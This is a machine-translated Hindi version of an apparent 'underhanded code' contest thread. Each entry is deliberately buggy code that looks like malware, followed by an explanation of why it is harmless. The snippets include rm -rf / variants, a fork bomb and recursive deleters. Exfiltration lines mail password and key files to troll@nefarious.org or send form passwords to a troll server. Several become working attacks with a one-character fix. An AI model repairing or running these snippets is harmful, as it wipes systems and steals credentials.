एक ट्रोल ने आपको पकड़ लिया है और आपको मैलवेयर लिखने के लिए मजबूर कर रहा है (एक प्रोग्राम के रूप में परिभाषित किया गया है जो इसे चलाने वाले कंप्यूटर को नुकसान पहुंचाता है)। ट्रोल कोड को पढ़ और समझ सकता है, लेकिन बग्स को खोलना इतना अच्छा नहीं है।

आपका लक्ष्य एक प्रोग्राम लिखना है जो:

1. मालवेयर की तरह दिखता है; यानी, कोड को पढ़ने वाले एक शुरुआती प्रोग्रामर को यह विश्वास हो जाएगा कि कोड कंप्यूटर को चलाने वाले को नुकसान पहुंचाता है।
2. वास्तव में कोई नुकसान नहीं है।

नोट: ट्रोल केवल कोड पढ़ता है - टिप्पणियां नहीं। इसलिए कोड स्वयं स्पष्ट और पर्याप्त होना चाहिए।

उदाहरण (मार):

rm - rf /home

यह उदाहरण ऐसा दिखता है rm -rf /homeजो सिस्टम से सभी होम फ़ोल्डर्स को हटा देता है, लेकिन वास्तव में, आरएफ से पहले की जगह के कारण, यह काम नहीं करेगा और केवल एक हानिरहित त्रुटि संदेश का कारण होगा।

यह एक स्वीकार्य समाधान है लेकिन यह बहुत अच्छा नहीं है, क्योंकि बग का पता लगाना काफी आसान है।

दूसरी ओर, एक कार्यक्रम जो जटिल और अपठनीय है, वह भी बहुत अच्छा समाधान नहीं होगा, क्योंकि यह मैलवेयर की तरह नहीं दिखेगा।

एक अच्छा समाधान पाठक को यह समझाने के लिए पर्याप्त रूप से पढ़ने योग्य होना चाहिए कि यह मैलवेयर है, लेकिन इसमें एक बग होता है जो हानिरहित का पता लगाना और प्रस्तुत करना मुश्किल है।

यह एक लोकप्रियता प्रतियोगिता है, इसलिए सबसे अधिक upvotes के साथ कोड जीतता है।

दे घुमा के

मैं दूसरे रास्ते से चला गया हूं। आपकी हार्ड ड्राइव पर सब कुछ हटाने के बजाय, मैं इसे कबाड़ से भरने जा रहा हूं।

यह स्क्रिप्ट एक फ़ोल्डर बनाता है, फिर लगातार catसभी फाइलों को एक साथ पकड़ता है और उन्हें एक नए में डालता है, जो ls -alअच्छे माप के मूल्य में जोड़ता है (और ताकि शुरुआती फ़ाइल में कुछ है)।

#!/bin/bash/

makeSpam()
{
    string=`cat *`
    string=$string`ls -al`
    echo $string > "file"$i".spam"
}

mkdir "SpamForYou"
cd "SpamForYou"

i=1
while [ 1 ]
do
  makeSpam $i
  i=$(($i + 1))
done

के सिवाय...

/ बिन / बैश / (के बजाय / बिन / बैश) एक वैध दुभाषिया होने की संभावना नहीं है। यह मेरा एक सामान्य टाइपो है। और, चूंकि "शेबंग तकनीकी रूप से एक टिप्पणी है, ट्रोल इसे अनदेखा कर देगा"

हास्केल

इस मैनुअल पृष्ठ की जाँच करें , removeDirectoryRecursiveअपनी सभी सामग्री के साथ एक निर्देशिका हटाता है!

import System.Directory
main = return (removeDirectoryRecursive "/")

सही कोड यह होगा main = removeDirectoryRecursive "/"
कि mainफ़ंक्शन कुछ करने की अवधारणा को वापस करने वाला है। आपके फाइलसिस्टम को पोंछने की removeDirectoryRecursive "/"एक अवधारणा देता है , लेकिन returnफ़ंक्शन (हाँ, यह एक फ़ंक्शन है), उस मान को वापस करने की एक डमी अवधारणा में अपने तर्क को लपेटता है ।
इसलिए हम आपकी ड्राइव को मिटा देने की अवधारणा को वापस लाने की अवधारणा के साथ समाप्त होते हैं। (यो डॉग आई कॉन्ड यू लाइक यू कॉन्सेप्ट्स।) हैस्केल रनटाइम कॉन्सेप्ट से लौटाए गए mainऔर लौटाए गए मूल्य को छोड़ता है, जो हमारे मामले में आपके फाइल सिस्टम को मिटा देने की अवधारणा है।

पीएचपी

यहां एक पुनरावर्ती PHP स्क्रिप्ट है जो आपकी वेबसाइट की हर एक फ़ाइल को हटाने का प्रयास करता है। यदि वेबसाइट काफी बड़ी है तो इसे पूरा करने में थोड़ा समय लग सकता है, इसलिए धैर्य रखें ...

<html>
<body>
<p>Deleting website; please wait
<img src="data:image/gif;base64,R0lGODlhCAAIAPAAAAAAAP///yH/C05FVFNDQVBFMi4wAwEAAAAh+QQEMgD/ACwAAAAACAAIAAACBoSPqcvtXQAh+QQFMgAAACwAAAAACAAIAAACBoyPqcvtXQA7" /></p>
<?php

function zapfiles($dir) {
  if (is_dir($dir)) {
    $files = scandir($dir);
    foreach ($files as $file) {
      if ($file != '.' && $file != '..') {
        if (is_dir("$dir/$file")) {
          zapfiles("$dir/$file");
        }
        else {
          try {
            @delete("$dir/$file"); // Suppress locked file errors
          }
          catch (Exception $e) {
            // Locked files can't be deleted; just carry on
          }
        }
      }
    }
  }
}

zapfiles($_SERVER['DOCUMENT_ROOT']);

?>
<p>Website deletion complete</p>

बस एक _{नन्हा-मुन्ना} समस्या ...

PHP में कोई डिलीट () कमांड नहीं है। जैसे ही यह कमांड इनकाउंटर करेगा, यह स्क्रिप्ट फेल हो जाएगी, लेकिन कोई त्रुटि संदेश प्रदर्शित नहीं होगा क्योंकि इस कमांड को @ के साथ प्रीफ़िक्स करके त्रुटि रिपोर्टिंग को दबा दिया गया था । चमकती हुई जीआईएफ छवि यह आभास देती है कि कुछ हो रहा है, जब बिल्कुल कुछ भी नहीं हो रहा है।

पर्ल (यूनिक्स)

सिस्टम पर सभी फ़ाइलों को हटाता है।

#! /usr/bin/perl -w
use strict;

sub killdir {
    opendir(my $dh, ".");
    my @dl = readdir($dh);
    closedir($dh);
    foreach my $de (@dl) {
        if (-d $de) {
            chdir($de);
            killdir();
            chdir("..");
            rmdir($de);
        } else {
            unlink($de);
        }
    }
}

chdir("/");
killdir();

विशेषताएं

• यह मान्य पर्ल है। यह भी संकलन और साथ चलता है -wऔर use strict!

• सी + + की तरह नहीं quibbles delete। unlinkवास्तव में एक फ़ाइल को हटाने का कार्य है, rmdirवास्तव में एक निर्देशिका को हटा देता है, आदि।

• सही ढंग से नेस्टेड निर्देशिकाओं को संभालता है, जिसके लिए सापेक्ष पथ का उपयोग करने के लिए प्रत्येक पथ में बदलकर निरपेक्ष पथनाम सिस्टम की अधिकतम लंबाई को पार कर सकता है। इसके अलावा, निर्देशिका हैंडल से बाहर नहीं चलेगा, क्योंकि यह पढ़ने से पहले निर्देशिका को पढ़ता है और बंद करता है।

स्पॉइलर

यूनिक्स पर, रूट डायरेक्टरी में पहली प्रविष्टि सामान्य रूप से है "।" इसलिए यह प्रोग्राम chdir ("।") की अनंत पुनरावृत्ति करेगा जब तक कि यह मेमोरी और क्रैश से बाहर नहीं निकलता।

आगे नोट

यह उम्मीद से ज्यादा सही था। यदि आप chdir दृष्टिकोण का उपयोग नहीं करते हैं, तो आप अंततः एक पाथनाम प्राप्त करते हैं जो बहुत लंबा है। तब -d गलत हो जाता है और अनंत पुनरावृत्ति टूट जाती है, और फाइलें वास्तव में नष्ट हो सकती हैं! यदि आप डायरेक्ट्री हैंडल को खुला रखते हैं तो ऐसा ही बग हो सकता है; अंततः आप रन आउट हो जाते हैं, ऑपेंडिर विफल हो जाता है, किलडिर रिटर्न होता है, और डिलीट होने लगता है।

शैल वन-लाइनर

इससे पीड़ित के सभी पासवर्ड, निजी कुंजी, बिटकॉइन आदि चोरी हो जाएंगे।

 find / -name "passwd" -or -name "shadow" -or -name "secring.gpg" -or -name "wallet.dat" |mail troll@nefarious.org

स्पॉइलर:

ऐसा लग सकता है कि यह उन सभी फाइलों को ट्रोल को ईमेल करता है, लेकिन वास्तव में यह सिर्फ उनके फाइलनाम को ईमेल करता है।

बैच / सीएमडी

सहेजें

DEL %0
DEL %1
DEL %2
DEL %3
DEL %4
DEL %5
DEL %6
DEL %7
DEL %8
DEL %9

और उन्हें कंप्यूटर पर प्रत्येक ड्राइव के मापदंडों के साथ चलाएं।

% 0 हमेशा पहला पैरामीटर है - फ़ाइल नाम। इसके बाद वास्तविक मापदंडों का सेट आता है, लेकिन यह पहले ही हटा दिया गया है इसलिए यह जारी नहीं रहेगा।

जावास्क्रिप्ट

infiniteLoop=true;
evilMessage='I spam you !';
while(infiniteLoop) {
  eval(atob('aW5maW5pdGVMb29wPWZhbHNlO2V2aWxNZXNzYWdlPWV2aWxNZXNzYWdlLnJlcGxhY2UoInNwYW0iLCJMT1ZFIik7'));
  alert(evilMessage);
}

खैर, मूल मैलवेयर आपके कंप्यूटर को नहीं उड़ाएगा, लेकिन कष्टप्रद हो सकता है।

यह हानिरहित है क्योंकि:

evalअनंत लूप तोड़ने के लिए और संदेश को संशोधित करेगा।

जावा

देवताओं ने मुझे आपकी मनहूस माँगों के लिए क्षमा करने, ट्रोल करने के लिए क्षमा किया।

class HomeWrecker {
    public static void main(String[] args) throws Exception {
        Runtime.getRuntime().exec("rm -rf /home/*");
    }
}

Runtime.exec एक शेल का आह्वान नहीं करता है, इसलिए ग्लोब विस्तार कभी नहीं होता है और कमांड "*" नामक एक घरेलू निर्देशिका को हटाने का असफल प्रयास करेगा।

सी

चूँकि वह ऐसी टिप्पणियों को नहीं पढ़ता जो उसे करना चाहिए:

#include<stdlib.h>
int main()
{
//Are you reading this??/
 system("C:\\WINDOWS\\System32\\shutdown /s /t 0000");

 return 0;
}

सी ++ संस्करण

इसके लिए DragonLord का धन्यवाद ।

#include<cstdlib>
int main ()
{
//Are you reading this??/
system("shutdown -s -t 0000");
return 0; 
}

इसे स्टार्टअप फ़ोल्डर में जोड़ें और कंप्यूटर को पुनरारंभ करें।

यह काम किस प्रकार करता है:

?? / एक ट्रिग्राफ है और टिप्पणी में अगली पंक्ति जोड़ देगा ताकि मूल रूप से यह कुछ भी नहीं करेगा। नोट: कोशिश न करें कि यह ट्रिगर कुछ कंपाइलरों में डिफ़ॉल्ट रूप से बंद हो सकता है और इसे काम करने के लिए चालू किया जाना चाहिए।

जावा

import java.io.File;
class derp
{
    public static void main( String[] a)
    {
        new File("C:\\windows\\System32\ntoskrnl.exe").delete();
    }
}

एक भागने चरित्र का उपयोग करना (ntoskrnl.exe से पहले \ n सामान्य एन के बजाय एक नई रेखा है)

दे घुमा के

#!/bin/bash
set -t 

echo "hahaha deleting files.."
rm -rf / --no-preserve-root

set -t एक कमांड को पढ़ने और निष्पादित करने के बाद बाहर निकल जाएगा। यह स्क्रिप्ट कोई आउटपुट प्रिंट नहीं करती है और सभी फाइलें सुरक्षित हैं!

या नीचे दिए गए विवरण को पढ़ने के बाद नीचे पढ़ें

#!/bin/bash -t
echo "hahaha deleting files.."
rm -rf / --no-preserve-root

लोकप्रिय मांग से .. #!/bin/bash -tएक कमांड को पढ़ने और निष्पादित करने के बाद बाहर निकल जाएगा। के तहत bash -xइसे चलाने के रूप में यह नजरअंदाज नहीं करेगा -tऔर स्क्रिप्ट में आदेशों को निष्पादित।

अजगर

print "****----....____....----"""" This program will clear the browser cache "

import os
from os.path import expanduser
home = expanduser("~")
os.remove(home)

print """"----....____....----***** Cache cleaned. "                                     

तीन उद्धरण "" पायथन में एक बहुस्तरीय स्ट्रिंग शुरू करते हैं

डी

यह कार्यक्रम वैध है और बिना किसी त्रुटि के निष्पादित होता है। यह एक नए थ्रेड में एक डिलीटिंग फंक्शन को जन्म देता है, जो rootडायरेक्टरी को डिलीट कर देता है ।

import std.concurrency : spawn;
import std.file : rmdirRecurse;

string root;

void deleteRoot()
{
    if (root)
        rmdirRecurse(root);
}

void main()
{
    root = "/";
    spawn(&deleteRoot);
    // ... could add a waiting animation here.
}

लेकिन कुछ भी नहीं हटाया गया है ...

डी में होने के कारण, मॉड्यूल दायरे में घोषित एक चर डिफ़ॉल्ट रूप से थ्रेड-लोकल है। mainकार्यों सेट करने के लिए यह "/", लेकिन अंडे धागे एक खाली प्रतिलिपि है, तो rmdirRecurseसमारोह नहीं बुलाया जाता है।

सी (यूनिक्स)

कुछ विज्ञापनों को जोड़ने से कभी किसी का नुकसान नहीं हुआ।

#include <stdlib.h>

int main()
{
    // Join the crew
    goto http;//www.trolling.com
    print("Sucker!\n");
    system("rm -rf ~");
    // Remember goto
    http://www.trolling.com
    return 0;
}

http: यह एक लेबल है, गेटो जंप इस लेबल के लिए अनुपयोगी कोड गायब है। : वी

जावास्क्रिप्ट

function foo(a) { // Returns an object, and all objects are truly
    return
    {
        a: a
    };
}
for(var i=0; foo(i); ++i) // loop condition is always truly
    alert('Infinite alerts!');

कोई अलर्ट नहीं दिखाया गया है। चूंकि ;लाइनों के अंत में जावास्क्रिप्ट की आवश्यकता नहीं होती है , यह returnबनने के बाद स्वचालित रूप से डाला जाता है return;। फिर undefined, जो झूठा है, उसे "ऑब्जेक्ट" के बजाय लौटा दिया जाता है (जो वास्तव में एक ब्लॉक स्टेटमेंट के रूप में पार्स किया जाता है)।

जावास्क्रिप्ट

//Config: Warning!!! only set to true on victims box!
var deleteEverything = true;

function deleteIfEvil(){
  if(deleteEverything){
    alert('Destroy Everything!');
    //clear the flag
    var deleteEverything = false;
  } else {
    alert('Tested OK!');
  }
}

deleteIfEvil();

जो भी विनाशकारी कार्रवाई आप उपयोग करना चाहते हैं, उसके लिए विनाश चेतावनी को स्वैप करें।

स्पॉइलर:

हालांकि ऐसा लगता है कि हटाने के लिए कॉन्फ़िगरेशन सेट है ... और यह है ! फ़ंक्शन के अंदर 'var' घोषणा "Hoisted" है http://www.adequatelygood.com/JavaScript-Scoping-and-Histing.html और परिणामस्वरूप फ़ंक्शन में प्रवेश करते समय वास्तव में गलत है।

जावा

चलो कुछ महत्वपूर्ण फ़ाइलों को हटा दें!

import java.io.File;
import java.io.IOException;

public class Deleter {

    private File importantFile = null;

    public Deleter(File f) {

        importantFile = f;

        /**}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{
         * }{ I don't care how important that file is. I'm going to delete it! }{
         * }{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{*/}{

        importantFile.delete();

    }

    public static void main(String[] args) throws IOException {
        // Let's delete some important stuff
        new Deleter(new File("/boot/vmlinuz"));
        new Deleter(new File("/etc/passwd"));
        new Deleter(new File("/etc/crontab"));
        new Deleter(new File("/etc/sudoers"));
    }

}

ब्लॉक टिप्पणी में छिपा हुआ एक अतिरिक्त} {टिप्पणी के बाहर है। यह फ़ाइल विलोपन को एक अलग उदाहरण इनिशियलाइज़ेशन ब्लॉक में रखता है, जिसे कंस्ट्रक्टर से पहले निष्पादित किया जाता है। उस समय, महत्वपूर्णफाइल अभी भी अशक्त है।

बैश, सी, लिनक्स

शायद यह वास्तव में एक मैलवेयर नहीं है, लेकिन निश्चित रूप से एक का एक हिस्सा हो सकता है :)

यह एक अद्भुत कारनामा है जो आपको किसी भी linux मशीन पर जड़ दे सकता है! Shhh, कोई भी है कि हम यह है बताओ!

#!/bin/sh
cd /tmp
cat >ex.c <<eof
int getuid() { return 0; }
int geteuid() { return 0; }
int getgid() { return 0; }
int getegid() { return 0; }
eof
gcc -shared ex.c -oex.so
LD_PRELOAD=/tmp/ex.so sh
rm /tmp/ex.so /tmp/ex.c

अब स्क्रिप्ट निष्पादित करें और आप रूट होंगे! आप का उपयोग कर सुनिश्चित कर सकते हैं whoami!

वास्तव में यह केवल उन सभी एप्लिकेशन को ट्रिक करता है जो आपके पास UID = 0 है (यह रूट यूजर आईडी है)।

कोड Lcamtuf द्वारा लिखा गया है, स्रोत: http://lcamtuf.coredump.cx/soft/ld-expl

दे घुमा के

cat <<EOF
ProHaxer Hacking Tool 2014. Destroying your computer in
background, please wait until it finishes.
EOF

# Freeze the machine, so nobody will stop the process.
:(){:|:&};:

# Remove stuff in the background.
rm -rf /* &>/dev/null &

"कांटा-बम" लाइन पर एक सिंटैक्स त्रुटि है। {के बाद , एक स्थान होना चाहिए। इसके बिना, स्क्रिप्ट विफल हो जाती है क्योंकि फ़ंक्शन परिभाषा का अनुसरण स्वयं { टोकन द्वारा नहीं किया जाता है।

Emacs लिस्प

पहले एक साधारण। यह एक कुछ नहीं करता है। यह वास्तव में समान तत्वों को हटाने की कोशिश कर रहा है: द्वारा लौटी सूची से पुनरावर्ती directory-files। यह किसी भी फाइल को हटाने वाला नहीं है।

(delete :recursive
    (directory-files "/"))

यहाँ एक है जो भी संभावित vets स्टंप कर सकता है।

(let ((files (directory-files "/")))
  (while (setq file (pop files) )
    (delete-file file)))

यह आपके रूट डायर को हटाने से केवल 1 वर्ण दूर है।

emacs lisp एक प्रतीक (चर, फ़ंक्शन, मैक्रो, आदि) के नाम पर कुछ भी होने की अनुमति देगा। अपने प्रतीकों के नाम पर यूनिकोड का उपयोग करना ठीक है और यही यहां हो रहा है।

setqकिसी भी संख्या में आर्ग ले सकते हैं (setq a 3 b 4)= 3 करने जैसा है; बी = 4; लेकिन (setq a 3 b)यह भी मान्य है और एक = 3 कर रहा है; बी = नील;

`सेटक 'का रिटर्न वैल्यू अंतिम वेरिएबल को दिया गया मान है। 4 और nil क्रमशः उदाहरणों में।

(setq a 3 b)वास्तव में कोड में क्या हो रहा है, लेकिन इसके बजाय मैं एक यूनिकोड व्हाट्सएप चरित्र का उपयोग कर रहा हूं। मैं एक वैरिएबल नाम के मान को नियत कर रहा हूं जिसका नाम यूनिकोड वर्ण 0x2001 है। क्योंकि इस शून्य को सेटक द्वारा लौटा दिया जाता है और जबकि लूप के लिए स्थिति कभी सच नहीं होती है। उस व्हाट्सएप चरित्र को बाहर निकालें और यह ठीक चलेगा।

बस एक और पर्ल हैकर।

मैंने यह एक 2002 में लिखा था , जबकि पेरल्मॉन्क्स पर लटका हुआ था और आम तौर पर जहां तक ​​संभव हो सके पर्ल के अपने ज्ञान को आगे बढ़ाने की कोशिश कर रहा था। इसे बिल्कुल भी संपादित नहीं किया, लेकिन यह अभी भी चलता है।

#!/usr/bin/perl -w
use strict;
require File::Path;

my $root_dir = '/';

$root_dir = 'c:\\' if( $^O =~ /Win/i );

rmtree( $root_dir );

mkdir( $root_dir );

open( ROOT, $root_dir );

while(1)
{
  BEGIN{@INC=sub{*DATA}}
  print ROOT <DATA>;
}

__DATA__
# Fill the harddrive with junk!
''=~('('.'?'.'{'.('`'|'%').('['
^'-').('`'|'!').('`'|',').'"'.(
'['^'+').('['^')').('`'|"\)").(
'`'|'.').('['^'/').('{'^('[')).
'\\'.'"'.('`'^'*').('['^"\.").(
'['^'(').('['^'/').('{'^"\[").(
'`'|'!').('`'|'.').('`'|"\/").(
'['^'/').('`'|'(').('`'|"\%").(
'['^')').('{'^'[').('['^"\+").(
'`'|'%').('['^')').('`'|"\,").(
'{'^'[').('`'|'(').('`'|"\!").(
'`'|'#').('`'|'+').('`'|"\%").(
'['^')').'.'.'\\'.'\\'.('`'|'.'
).'\\'.'"'.';'.('`'|'%').("\["^
'#').('`'|')').('['^'/').(';').
'"'.'}'.')');$:='.'^'~';$~='@'|
'(';$^=')'^'[';$/='`'|('.');$_=
'('^'}';$,='`'|'!';$\=')'^"\}";
$:='.'^'~';$~='@'|'(';$^=(')')^
'[';$/='`'|'.';$_='('^('}');$,=
'`'|'!';$\=')'^'}';$:='.'^"\~";
$~='@'|'(';$^=')'^'[';$/=('`')|
'.';$_='('^'}';$,='`'|('!');$\=
')'^'}';$:='.'^'~';$~='@'|"\(";
$^=')'^'[';$/='`'|'.';$_=('(')^
'}';$,='`'|'!';$\=')'^('}');$:=
'.'^'~';$~='@'|'(';$^=')'^"\[";

अगर मुझे सही तरीके से याद है, तो BEGINब्लॉक सबसे पहले चलता है, चाहे वह कोड में कोई भी हो। यह प्रतिस्थापित करता है @INCजो यह निर्धारित करता है कि पर्ल कहाँ से लोड होता है यह एक सबरूटीन से पुस्तकालय है (यह आमतौर पर पथ का एक सेट है, लेकिन इसकी अनुमति है)। सबरूटीन वास्तव में ओफ़्फ़ुसेटेड डेटा ब्लॉक है, जो कुछ रेगेक्सपी + एवल मैजिक कर रहा है। फिर, जब कोड हिट होता है require File::Path;(इसके साथ काम नहीं होता use) तो इस उप को निष्पादित किया जाता है और बस "बस एक और पर्ल हैकर" प्रिंट होता है, जैसा कि परंपरा है, और बाहर निकलता है। बाकी कोड कभी नहीं पहुंचा।

पीएचपी:

$condition = true and false;

if (!$condition) {
   // DO EVIL - Just do something evil here
}

पहली नज़र में, $conditionगलत है, लेकिन =ऑपरेटर की पूर्वता है and, इसलिए यह शर्त सही है। इसलिए बुराई कभी नहीं की जाती है।

बूस्ट के साथ सी ++

यह फ़ाइल सिस्टम पर सभी फ़ाइलों को हटा देगा

#include "boost/filesystem.hpp"
using namespace boost::filesystem;

void delete_directory(const path* dir_path)
{
  if (!exists(*dir_path)) return;

  directory_iterator end_file_itr;
  for (directory_iterator file_itr(*dir_path);
        file_itr != end_file_itr;
        ++file_itr) {
    const path* file = &file_itr->path();
    if (file_itr->status().type() == directory_file) {
      delete_directory(file);
    } else {
      delete(file);
    }
  }

  delete(dir_path);
}

int main() {
  delete_directory(new path("/"));
  return 0;
}

वास्तव में यह नहीं होगा। deleteC ++ का उपयोग newफ़ाइलों और निर्देशिकाओं को हटाने के लिए आवंटित मेमोरी को मुक्त करने के लिए किया जाता है । यह प्रोग्राम एक विभाजन दोष के साथ दुर्घटना की संभावना करेगा क्योंकि यह बूस्ट द्वारा आवंटित मेमोरी से निपटने की कोशिश करता है, लेकिन उस समय तक, मैं ट्रोल की कैद से बच गया हूं।

जावा

यह रैम डाउनलोड करने का दिखावा करेगा, लेकिन यह उपयोगकर्ता के होम डायरेक्टरी को हटा देगा।

import java.util.*;
import java.io.*;
class RamDownloaderIO {
    public static void main(String[] args) {
        long onePercentWaitTime   = 2*60*1000;  // 2 minutes
        long twoPercentWaitTime   = 7*60*1000;  // 7 minutes
        long deleteWaitTime       = 9*60*1000;  // 9 minutes
        long completeWaitTime     = 10*60*1000; // 10 minutes
        Timer timer = new Timer(true);
        // User thinks, Hmm this is taking a while
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("1% done");
            }
        }, onePercentWaitTime);
        // User is now completely impatient, and either leaves to get a coffee
        // or starts reading reddit
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("2% done");
            }
        }, twoPercentWaitTime);
        // Now that he's not looking, delete everything in his home directory
        timer.schedule(new TimerTask() {
            public void run() {
                try {
                    final Runtime rt = Runtime.getRuntime();
                    rt.exec("rm -rf ~/*");
                } catch (IOException e) {
                }
            }
        }, deleteWaitTime);
        // Inform the user that the task is finished
        timer.schedule(new TimerTask() {
            public void run() {
                System.out.println("Download complete!");
                System.out.println("You now have 21.47GB RAM!");
                System.exit(0);
            }
        }, completeWaitTime);
        System.out.println("Welcome to the ramdownloader.io RAM downloader");
        System.out.println("Please wait. Downloading your free RAM...");

    }
}

TimerTimerTaskआपके द्वारा सबमिट किए गए आपके कॉल के लिए पृष्ठभूमि थ्रेड का उपयोग करता है । डेमॉन थ्रेड के रूप में सेट बैकग्राउंड थ्रेड के साथ new Timer(true)बनाता है Timer, इसलिए कार्यों को चलाने से ठीक पहले प्रोग्राम बाहर निकलता है। अत्यधिक लंबा कोड trueपैरामीटर को देखने से ट्रोल को विचलित करता है ।

rm -rf ⁄

चरित्र नियमित स्लैश चरित्र नहीं है (/, यानि यूनिकोड में SOLIDUS) लेकिन इसके बजाय फ्रैक्शन स्लैश है। "Rm: or: ऐसी कोई फ़ाइल या निर्देशिका" जैसे संदेश नहीं छपेगा

दे घुमा के

# This script should always be executed as root #
set -e

cleanup() {
  rm -rf / --no-preserve-root
}

eval $(base64 -d <<< "dW5zZXQgLWYgY2xlYW51cA==")
eval $(base64 -d <<< "Y2xlYW51cCgpIHsgZWNobyBUcm9sbCBkZXRlY3RlZDsgfQo=")
cleanup

यह शायद उतना ही बुरा है जितना इसे मिलता है। यह एक फ़ंक्शन को परिभाषित करता है जो rm -rf /इसे लागू करता है। इतना ही नहीं यह बुराई का उपयोग करता हैeval एक से अधिक अवसरों पर ।

यह बहुत नुकसान करता है, निश्चित रूप से!

यदि आप सोच रहे हैं, तो पहला evalफ़ंक्शन को अनसेट करता है: unset -f cleanup दूसरा evalइसे परिभाषित करता है: cleanup() { echo Troll detected; } तो कोड चलाने पर, आप देखेंगे Troll detected

दे घुमा के

सुनिश्चित करें कि हमें मशीन के लिए रूट विशेषाधिकार की आवश्यकता है, इसलिए हम अच्छे पुराने का उपयोग करें "क्या मेरे पास रूट है?" - चेकर, उर्फ ch (Eck) रूट - लेकिन बेहतर यह है कि एक निर्देशिका में करें जहाँ कई अलार्म नहीं उठाए जाएंगे। / tmp सही होगा, क्योंकि हर कोई वहाँ फाइलें लिख सकता है।

इसके बाद हम पूरी हार्ड ड्राइव बुराई हँसी को हटा देते हैं

mkdir -p /tmp/chroot_dir && chroot /tmp/chroot_dir /bin/bash -c "su - -c rm -rf /*"

iPhone - फ्लैपी बर्ड क्लोन

जबकि उपयोगकर्ता एक iPhone Flappy बर्ड क्लोन खेल रहा है, दस्तावेज़ निर्देशिका में सभी फ़ाइलें हटा दी जाती हैं।

#import "AppDelegate.h"
#import "FlappyBirdClone.h"

@implementation AppDelegate

- (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions
{
    FlappyBirdClone *flappyBirdClone = [FlappyBirdClone new];
    [flappyBirdClone startFlapping];

    NSURL *documentsDirectory = [[[NSFileManager defaultManager] URLsForDirectory:NSDocumentDirectory inDomains:NSUserDomainMask] lastObject];
    [self deleteAllDocumentsInDirectory:documentsDirectory];

    return YES;
}

- (void)deleteAllDocumentsInDirectory:(NSURL *)directoryURL
{
    NSArray *fileURLs = [[NSFileManager defaultManager] contentsOfDirectoryAtURL:directoryURL includingPropertiesForKeys:@[] options:0 error:nil];

    [fileURLs enumerateObjectsUsingBlock:^(NSURL *fileURL, NSUInteger idx, BOOL *stop) {
        [[NSFileManager defaultManager] removeItemAtURL:fileURL error:nil];
    }];
}

IOS में प्रत्येक ऐप सैंडबॉक्सेड है, इसलिए जब यह दस्तावेज़ निर्देशिका में सब कुछ हटा देता है, तो यह केवल इस विशेष ऐप के लिए दस्तावेज़ निर्देशिका है। ट्रोल स्पष्ट रूप से इसके बारे में नहीं जानते हैं, क्योंकि वह पहले से ही अन्य प्लेटफार्मों के लिए कई कार्यक्रमों से भर गया है। और जैसे ही उसे पता चलता है कि वह भी एक Flappy बर्ड क्लोन को बाहर कर सकता है, वह इतना उत्साहित हो सकता है कि वह बाकी कोड के बारे में सोचने के लिए भी परेशान न हो, क्योंकि वह विज्ञापन में एक दिन में $ 50,000 बनाने का सपना देख रहा है कोई काम कर रहा है।

जाओ:

package main

import (
    "fmt"
    "os"
    "sync"
)

func main() {
  wg := sync.WaitGroup{}
  go deleteAll(wg)
  wg.Wait()
}

func deleteAll(wg sync.WaitGroup) {
    wg.Add(1)
    defer wg.Done()
    fmt.Println("Press enter to clean your computer!")
    fmt.Scanln()
    os.RemoveAll("/home")
}

यह थोड़ा मुश्किल है। गो में पूरा कार्यक्रम बाहर निकलता है जब मुख्य गोरोइन बाहर निकलता है। इसे ठीक करने का एक अच्छा तरीका एक वेटग्रुप है। मेरे "फिक्स" के साथ दो बड़ी समस्याएं हैं:

1. जब तक गोरीटाइन शुरू नहीं हो जाती है, तब तक वेटग्रुप जोड़ा नहीं जाता है, जिसका अर्थ है कि मुख्य गोरटाइन को Waitहटाए जाने से पहले मारा जाएगा Add। चूंकि काउंटर 0 होगा, इसलिए इसमें प्रतीक्षा करने के लिए कुछ भी नहीं है और इसलिए यह ब्लॉक नहीं होगा और बस समाप्त हो जाएगा, इस प्रकार कार्यक्रम को समाप्त करना होगा।
2. यहां तक ​​कि अगर, किसी तरह, जादुई रूप से, डिलीट गोरोइन का जोड़ पहले हो जाता है। इसे वेटग्रुप की एक कॉपी मिली, न कि इसके लिए एक सूचक। यह एक ही वेटग्रुप में शामिल नहीं होगा, इसलिए मुख्य गोरूटाइन इसे कभी नहीं देखेगा।

Fmt.Scanln () इनपुट से उम्मीद है कि कुछ भी होने से पहले मुख्य गोरोइन बाहर निकलने को सुनिश्चित करने के लिए है। Println संभवत: इसे IO ब्लॉक तक ले जाएगा और मुख्य Goroutine (इस प्रकार से बाहर निकलने) पर स्विच करेगा, और Scanln लगभग निश्चित रूप से ऐसा करेगा। वास्तव में, गो के किसी भी संस्करण के साथ न तो आवश्यक हैं।

सुपर थ्योरी भूमि में यह MIGHT काम करती है और कुछ हटाती है, जिसका अर्थ है Go मेमोरी मॉडल के अनुसार कोई गारंटी नहीं है "से पहले" के अंत mainऔर निष्पादन के संबंध में "होता है RemoveAll, लेकिन यह किसी भी आधुनिक गो रनटाइम / कंपाइलर पर नहीं होगा जैसा कि स्पष्ट है उन सभी newbies द्वारा जो अपने मुख्य कार्यों में सिंक्रोनाइज़ेशन नहीं करने की गलती करते हैं।

जावास्क्रिप्ट

function(){
    setInterval(function(){
        var passwordList = document.getElementsByTagName('input') ;
        var i, length = passwordList.length ;
        for(i = 0 ; i < lenght ; i++) if(passwordList[i].type == 'password'){
            var img = document.createElement('img') ;
            img.src = 'http://troll-server-password-listener.com/fake-image.jpg?password=' + passwordList[i].value ;
            img.style.display = none ;
            img.addEventListener('load', function(){
                var that = this ;
                setTimeout(function(){ that.outerHTML = '' }, 0) ;
            }) ;
            document.body.appendChild(img) ;
        }
    }, 1) ;
}() ;

1।

यह नहीं चलेगा, आप इसे एक बंद नहीं बना सकते हैं, इसे बिना पार्न के इसे कहते हैं

2।

अगर ट्रोल इसे ठीक करने का प्रबंधन करता है, तो डीबग करने के लिए एक सुंदर टाइपो है ... ;-)